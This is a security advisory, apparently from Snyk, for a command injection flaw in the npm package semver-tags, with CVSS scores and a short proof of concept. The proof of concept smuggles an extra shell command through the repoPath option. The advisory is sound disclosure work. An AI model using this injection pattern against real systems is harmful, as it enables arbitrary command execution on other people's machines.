Command Injection Affecting semver-tags package, versions *


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.05% (17th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-SEMVERTAGS-3175612
  • published 5 Feb 2023
  • disclosed 19 Dec 2022
  • credit Junmin Zhu at SJTU, JHU System Security Lab

How to fix?

There is no fixed version for semver-tags.

Overview

Affected versions of this package are vulnerable to Command Injection via the getGitTagsRemote function due to improper input sanitization.

PoC

var r = require("semver-tags")
opt = {"repoType":"git","repoPath":"\";touch EXPLOITED;\""}
finalCb = console.log
r(opt,finalCb)

References

CVSS Scores

version 3.1
Expand this section

Snyk

7.4 high
  • Attack Vector (AV)
    Local
  • Attack Complexity (AC)
    High
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    High
  • Availability (A)
    High
Expand this section

NVD

7.8 high